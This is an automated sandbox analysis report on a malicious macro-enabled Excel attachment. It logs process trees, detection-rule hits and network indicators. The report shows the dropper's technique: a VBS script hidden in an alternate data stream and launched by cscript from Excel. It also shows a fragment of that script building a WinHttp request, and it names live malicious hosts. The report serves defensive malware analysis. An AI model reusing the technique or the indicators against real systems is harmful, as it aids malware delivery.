Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7ccf88c0bbe3b29bf19d877c4596a8d4.zip

Overview

General Information

Sample name:7ccf88c0bbe3b29bf19d877c4596a8d4.zip
Analysis ID:1585741
MD5:adee407a5d9f4425707fe5bd4c25aa14
SHA1:5a99f6b3b106daf23ba2c29f2ff94cb118703414
SHA256:a53db45f1d4a2f36ebc0b0e268d2073baba89ca6c1d05fe9a06ef395e8658a51
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Creates HTML files with .exe extension (expired dropper behavior)
Document exploit detected (process start blacklist hit)
Microsoft Office drops suspicious files
Potential malicious VBS script found (suspicious strings)
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Excel Network Connections
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 5824 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • EXCEL.EXE (PID: 4108 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER SHEET & SPEC.xlsm" MD5: 4A871771235598812032C822E6F68F19)
    • cscript.exe (PID: 2076 cmdline: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
      • conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • splwow64.exe (PID: 7100 cmdline: C:\Windows\splwow64.exe 8192 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • splwow64.exe (PID: 5748 cmdline: C:\Windows\splwow64.exe 8192 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • cscript.exe (PID: 1656 cmdline: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
      • conhost.exe (PID: 4112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER SHEET & SPEC.xlsm", ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 4108, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, ProcessId: 2076, ProcessName: cscript.exe
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 4108, TargetFilename: C:\programdata\asc.txt:script1.vbs
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 177.53.143.89, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\cscript.exe, Initiated: true, ProcessId: 2076, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49712
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER SHEET & SPEC.xlsm", ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 4108, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, ProcessId: 2076, ProcessName: cscript.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER SHEET & SPEC.xlsm", ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 4108, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, ProcessId: 2076, ProcessName: cscript.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.45, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 4108, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49715
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 177.53.143.89, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\cscript.exe, Initiated: true, ProcessId: 2076, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49712
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.16, DestinationIsIpv6: false, DestinationPort: 49715, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 4108, Protocol: tcp, SourceIp: 13.107.246.45, SourceIsIpv6: false, SourcePort: 443
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER SHEET & SPEC.xlsm", ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 4108, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs, ProcessId: 2076, ProcessName: cscript.exe
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 4108, TargetFilename: C:\Users\user\Desktop\~$ORDER SHEET & SPEC.xlsm
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-08T07:13:35.339794+010020283713Unknown Traffic192.168.2.1649712177.53.143.89443TCP
2025-01-08T07:13:35.339794+010020283713Unknown Traffic192.168.2.1649712177.53.143.89443TCP
2025-01-08T07:13:35.339794+010020283713Unknown Traffic192.168.2.1649712177.53.143.89443TCP
2025-01-08T07:13:35.339794+010020283713Unknown Traffic192.168.2.1649712177.53.143.89443TCP
2025-01-08T07:13:35.339794+010020283713Unknown Traffic192.168.2.1649712177.53.143.89443TCP
2025-01-08T07:13:35.339794+010020283713Unknown Traffic192.168.2.1649712177.53.143.89443TCP
2025-01-08T07:14:30.244685+010020283713Unknown Traffic192.168.2.164971513.107.246.45443TCP
2025-01-08T07:14:30.244685+010020283713Unknown Traffic192.168.2.164971513.107.246.45443TCP
2025-01-08T07:14:30.244685+010020283713Unknown Traffic192.168.2.164971513.107.246.45443TCP
2025-01-08T07:14:30.244685+010020283713Unknown Traffic192.168.2.164971513.107.246.45443TCP
2025-01-08T07:14:30.244685+010020283713Unknown Traffic192.168.2.164971513.107.246.45443TCP
2025-01-08T07:14:35.399127+010020283713Unknown Traffic192.168.2.164971613.107.246.45443TCP
2025-01-08T07:14:35.399127+010020283713Unknown Traffic192.168.2.164971613.107.246.45443TCP
2025-01-08T07:14:35.399127+010020283713Unknown Traffic192.168.2.164971613.107.246.45443TCP
2025-01-08T07:14:35.399127+010020283713Unknown Traffic192.168.2.164971613.107.246.45443TCP
2025-01-08T07:14:35.399127+010020283713Unknown Traffic192.168.2.164971613.107.246.45443TCP
2025-01-08T07:14:35.425457+010020283713Unknown Traffic192.168.2.164971713.107.246.45443TCP
2025-01-08T07:14:35.425457+010020283713Unknown Traffic192.168.2.164971713.107.246.45443TCP
2025-01-08T07:14:35.425457+010020283713Unknown Traffic192.168.2.164971713.107.246.45443TCP
2025-01-08T07:14:35.425457+010020283713Unknown Traffic192.168.2.164971713.107.246.45443TCP
2025-01-08T07:14:35.425457+010020283713Unknown Traffic192.168.2.164971713.107.246.45443TCP
2025-01-08T07:14:47.381543+010020283713Unknown Traffic192.168.2.1649718177.53.143.89443TCP
2025-01-08T07:14:47.381543+010020283713Unknown Traffic192.168.2.1649718177.53.143.89443TCP
2025-01-08T07:14:47.381543+010020283713Unknown Traffic192.168.2.1649718177.53.143.89443TCP
2025-01-08T07:14:47.381543+010020283713Unknown Traffic192.168.2.1649718177.53.143.89443TCP
2025-01-08T07:14:47.381543+010020283713Unknown Traffic192.168.2.1649718177.53.143.89443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 7ccf88c0bbe3b29bf19d877c4596a8d4.zipVirustotal: Detection: 19%Perma Link
Source: 7ccf88c0bbe3b29bf19d877c4596a8d4.zipReversingLabs: Detection: 13%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknownHTTPS traffic detected: 177.53.143.89:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 177.53.143.89:443 -> 192.168.2.16:49718 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cscript.exe
Source: excel.exeMemory has grown: Private usage: 8MB later: 36MB

Networking

barindex
Source: C:\Windows\SysWOW64\cscript.exeFile created: Podaliri4.exe.12.dr
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49712 -> 177.53.143.89:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49715 -> 13.107.246.45:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49716 -> 13.107.246.45:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49718 -> 177.53.143.89:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49717 -> 13.107.246.45:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: multiwaretecnologia.com.br
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 177.53.143.89:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 177.53.143.89:443 -> 192.168.2.16:49718 version: TLS 1.2

System Summary

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\programdata\asc.txt:script1.vbs
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\programdata\asc.txt:script1.vbs
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEDropped file: usdi4y34jh = usdi4y34jh + "( ""WinHttp.WinHttpRequest.5.1"" )"Jump to dropped file
Source: classification engineClassification label: mal84.expl.winZIP@14/2@1/67
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ORDER SHEET & SPEC.xlsm
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4112:120:WilError_03
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{B91AC8C1-F04C-41F5-8F0E-FF07B071FCD9} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: 7ccf88c0bbe3b29bf19d877c4596a8d4.zipVirustotal: Detection: 19%
Source: 7ccf88c0bbe3b29bf19d877c4596a8d4.zipReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER SHEET & SPEC.xlsm"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 8192
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 8192
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 8192
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 8192
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe C:\programdata\asc.txt:script1.vbs
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msxml3.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msdart.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: mlang.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: winhttpcom.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: webio.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: schannel.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msxml3.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msdart.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: mlang.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: winhttpcom.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: webio.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: schannel.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
